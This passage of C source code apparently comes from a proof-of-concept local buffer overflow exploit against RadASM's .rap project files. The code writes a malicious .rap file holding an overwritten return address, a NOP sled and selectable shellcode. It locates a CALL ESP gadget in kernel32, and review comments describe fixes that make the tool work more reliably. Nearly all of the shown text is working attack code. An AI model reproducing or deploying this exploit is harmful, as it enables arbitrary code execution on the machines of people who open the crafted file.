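      if (argc < 2) {
          help();
          GetNtosDelta();
          printshell();
          printf("[^]The default retcode is :0x%lX\n", (unsigned long)ret);
          return 0;
      }
      printf("[!]%s\n[!]%s\n[!]By %s\n", POCNAME, VER, AUTHOR);

      while ((opt = getopt(argc, argv, "s:t:")) != -1) {
          char *end = NULL;
          switch (opt) {
          case 's': {
              long v;
              errno = 0;
              v = strtol(optarg, &end, 10);
              if (errno != 0 || end == optarg || *end != '\0' || v < 0 || v >= nshells) {
                  fprintf(stderr, "[-]Invalid shellcode index '%s' (expected 0..%d)\n",
                          optarg, nshells - 1);
                  return 1;
              }
              S = (int)v;
              break;
          }
          case 't': {
              unsigned long v;
              errno = 0;
              v = strtoul(optarg, &end, 16);   /* accepts both "DEADBEEF" and "0xDEADBEEF" */
              if (errno != 0 || end == optarg || *end != '\0' || v > 0xFFFFFFFFUL) {
                  fprintf(stderr, "[-]Invalid return address '%s'\n", optarg);
                  return 1;
              }
              ret = (DWORD)v;
              break;
          }
          default:
              help();
              return 1;
          }
      }

      if (ret == 0) {
          print("No return address available; pass one with -t");
          return 1;
      }
      buildfile(VULNF);
      printf("[#]You selected: %s\n", use[S].sname);
      print("DONE!");
      getchar();
      return 0;
  }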
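  /*
   * Build the malicious .rap and write it to `fname`.
   *
   * Layout, as absolute offsets into the 1534-byte `file` template:
   *   292  4-byte return address   <- ret
   *   312  10-byte NOP sled        <- NOP
   *   322  payload                 <- use[S].shell
   * Globals read: file, ret, S, use.  Exits the process on any error.
   *
   * Fixes against the original: `file` carries no terminating NUL, so
   * strlen(file) over-read the array -- sizeof(file) is used instead; the
   * free(buffer)/free(file) calls on a stack array and a global array were
   * undefined behaviour and are gone; fwrite/fclose results are checked.
   */
  void buildfile(char *fname) {
      static char buffer[100000];   /* static: keeps 100 KB off the stack */
      size_t shell_len;
      FILE *f;

      if (fname == NULL || S < 0 || S >= (int)(sizeof(use) / sizeof(use[0])) - 1
          || use[S].shell == NULL) {
          print("Bad shellcode selection");
          exit(EXIT_FAILURE);
      }

      gen_random(buffer, 5000);                 /* alnum filler, NUL at buffer[5000] */
      memcpy(buffer, file, sizeof(file));       /* never strlen(file): not NUL-terminated */
      memcpy(buffer + 292, &ret, sizeof(ret));  /* DWORD: 4 bytes, little-endian */
      memcpy(buffer + 312, NOP, 10);

      shell_len = strlen(use[S].shell);         /* payloads are NUL-free, so strlen is the byte length */
      if (322 + shell_len > sizeof(file)) {
          print("Shellcode does not fit inside the 1534-byte template");
          exit(EXIT_FAILURE);
      }
      memcpy(buffer + 322, use[S].shell, shell_len);
      printf("[#]Your Retcode is: 0x%lX\n", (unsigned long)ret);

      f = fopen(fname, "wb");
      if (f == NULL) {
          print("Error in writing file");
          exit(EXIT_FAILURE);
      }
      if (fwrite(buffer, 1, sizeof(file), f) != sizeof(file) || fclose(f) != 0) {
          print("Error in writing file");
          exit(EXIT_FAILURE);
      }

      printf("[!]File is %u bytes\n", getFsize(NULL, fname));
  }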
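         /*
          * Print the usage banner.  The original text advertised "-h<shellcode>",
          * but the option main() actually parses is -s; corrected here (same
          * width, so the box stays aligned).
          */
         void help(void)
         {
             static const char usage[] =
                 "************************************************\n"
                 "*Radasm .rap file local buffer overflow exploit*\n"
                 "*syntax: [-s<shellcode>]  [-t<your target>]    *\n"
                 "*  -s      shellcode  to run    0 or 1         *\n"
                 "*  -t      your target                         *\n"
                 "*  example: radasm.exe -s 0 -t 0xFFFFFFFF      *\n"
                 "* If you want a retcode default from your      *\n"
                 "* memory  don't use -t option                  *\n"
                 "************************************************\n";
             fputs(usage, stdout);
         }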
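       /*
        * List the payloads in use[] with their byte lengths.
        * Walks to the NULL-name sentinel instead of hard-coding the count of 2,
        * so adding a row to the table is enough.  Lengths are printed through
        * an unsigned cast because the MSVCRT printf used by MinGW builds does
        * not reliably understand %zu.
        */
       void printshell(void)
       {
           size_t i;
           print("We can use:");
           for (i = 0; use[i].sname != NULL; ++i) {
               printf("[!] %u. %s of size: %u bytes\n",
                      (unsigned)i, use[i].sname,
                      use[i].shell ? (unsigned)strlen(use[i].shell) : 0u);
           }
       }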
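         /*
          * Classify the Windows version of the machine running THIS program
          * (not the target) as an OSes value; 0 if it is not 5.0/5.1/5.2/6.x.
          * Also stores the result in g_dwOsVersion.
          *
          * Every 6.x reports as OS_VISTA.  NOTE(review): GetVersionExA is
          * deprecated and on newer Windows the reported version depends on the
          * application manifest, so the result is only trustworthy on the
          * XP/2003-era hosts this tool was written for -- confirm before relying
          * on it.
          */
         DWORD GetOSVersion(VOID)
         {
             OSVERSIONINFOA osvi = {0};
             DWORD retval = 0;

             osvi.dwOSVersionInfoSize = sizeof(osvi);
             if (GetVersionExA(&osvi)) {
                 if (osvi.dwMajorVersion == 5) {
                     switch (osvi.dwMinorVersion) {
                     case 0:  retval = OS_W2K;  break;
                     case 1:  retval = OS_WXP;  break;
                     case 2:  retval = OS_W2K3; break;
                     default: break;            /* unknown 5.x: stays 0 */
                     }
                 } else if (osvi.dwMajorVersion == 6) {
                     retval = OS_VISTA;
                 }
             }
             g_dwOsVersion = retval;
             return retval;
         }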
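  /*
   * Report the detected host OS and return the matching *_DELTA constant
   * (non-zero only for XP).  main() discards the return value and nothing in
   * this file ever applies a delta to `ret`, so this is informational only.
   *
   * The messages no longer carry the stray trailing 'n' (a lost "\n" escape):
   * print() already appends the newline.
   */
  DWORD GetNtosDelta(VOID)
  {
      DWORD retval = 0;

      switch (GetOSVersion()) {
      case OS_VISTA:
          print("System identified as Windows Vista");
          retval = WVISTA_DELTA;
          break;
      case OS_W2K:
          print("System identified as Windows 2000");
          retval = W2K_DELTA;
          break;
      case OS_W2K3:
          print("System identified as Windows 2003");
          retval = W2K3_DELTA;
          break;
      case OS_WXP:
          print("System identified as Windows XP");
          retval = WXP_DELTA;
          break;
      default:
          print("Unidentified system!");
          break;
      }
      return retval;
  }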
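   /*
    * Find the first occurrence of pvSubStream (uSubStreamSize bytes) inside
    * pvStream (uStreamSize bytes).  Returns the offset of the match, or
    * (DWORD)-1 when there is none or the arguments are unusable.
    *
    * The original only bounded the match *start* by uStreamSize, so a
    * candidate near the end could read up to uSubStreamSize-1 bytes past the
    * stream; the loop below never compares beyond pvStream + uStreamSize.
    * An empty needle is rejected rather than underflowing uSubStreamSize-1.
    */
   DWORD SearchStream(
       const char *pvStream,
       size_t uStreamSize,
       const char *pvSubStream,
       size_t uSubStreamSize)
   {
       size_t off;

       if (pvStream == NULL || pvSubStream == NULL ||
           uSubStreamSize == 0 || uSubStreamSize > uStreamSize) {
           return (DWORD)-1;
       }
       for (off = 0; off + uSubStreamSize <= uStreamSize; ++off) {
           if (memcmp(pvStream + off, pvSubStream, uSubStreamSize) == 0) {
               return (DWORD)off;
           }
       }
       return (DWORD)-1;
   }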
 
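    /*
     * Scan the kernel32.dll image mapped into THIS process for a CALL ESP
     * (FF D4) and return its virtual address; 0 if kernel32 cannot be found,
     * its headers do not look like a PE, or no gadget exists.
     *
     * The address is only useful against a target whose kernel32 is the same
     * build and is loaded at the same base as on the generating host; the
     * base differs between Windows versions/service packs and, with ASLR,
     * between boots.  The original returned hModule-1 when the scan failed;
     * callers should treat 0 as "no default, use -t".
     *
     * The gadget bytes are written as real \xFF\xD4 escapes; the page had
     * lost the backslashes, which would have searched for the ASCII text
     * "xFFxD4".
     */
    DWORD FindRetToEspAddress(VOID)
    {
        static const char szCallEsp[] = "\xFF\xD4";   /* CALL ESP */
        HMODULE hModule = GetModuleHandleA("kernel32.dll");
        PIMAGE_DOS_HEADER dos;
        PIMAGE_NT_HEADERS nt;
        DWORD off;

        if (hModule == NULL)
            return 0;
        dos = (PIMAGE_DOS_HEADER)hModule;
        if (dos->e_magic != IMAGE_DOS_SIGNATURE)
            return 0;
        nt = (PIMAGE_NT_HEADERS)((BYTE *)hModule + dos->e_lfanew);
        if (nt->Signature != IMAGE_NT_SIGNATURE)
            return 0;

        off = SearchStream((const char *)hModule,
                           nt->OptionalHeader.SizeOfImage,
                           szCallEsp, sizeof(szCallEsp) - 1);
        if (off == (DWORD)-1)
            return 0;
        return off + (DWORD)(ULONG_PTR)hModule;
    }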
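  /*
   * Return the size in bytes of the file named `gname`.
   * The `g` parameter is ignored (the file is reopened by name); it is kept
   * for the existing callers.  Prints an error and exits on failure.
   * Fixes: the stream is now closed (the original leaked it), and fseek/ftell
   * failures are no longer returned as a huge unsigned value.
   */
  unsigned int getFsize(FILE *g, char *gname)
  {
      long pos;

      (void)g;
      g = fopen(gname, "rb");
      IF(g, NULL) {
          print("File error at reading");
          exit(EXIT_FAILURE);
      }
      if (fseek(g, 0, SEEK_END) != 0 || (pos = ftell(g)) < 0) {
          fclose(g);
          print("File error at reading");
          exit(EXIT_FAILURE);
      }
      fclose(g);
      return (unsigned int)pos;
  }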
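      /*
       * Print "[*]<msg>" followed by a newline to stdout.
       * The format string lost its "\n" escape on the page ("%sn", which
       * printed a literal 'n'); restored.  A NULL msg prints an empty message.
       */
      void print(char *msg)
      {
          printf("[*]%s\n", msg ? msg : "");
      }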
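    /*
     * Fill s[0..len) with random alphanumeric characters and NUL-terminate at
     * s[len]; the caller must provide len + 1 bytes.  Used as filler whose
     * bytes help locate offsets in a crash dump.
     * rand() is never seeded in this file, so the filler is the same on every
     * run, which is fine for offset hunting.  Does nothing for a NULL buffer
     * or a negative length.
     */
    void gen_random(char *s, const int len)
    {
        static const char alphanum[] =
            "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
        const int nchars = (int)(sizeof(alphanum) - 1);   /* exclude the NUL */
        int i;

        if (s == NULL || len < 0)
            return;
        for (i = 0; i < len; ++i)
            s[i] = alphanum[rand() % nchars];
        s[len] = '\0';
    }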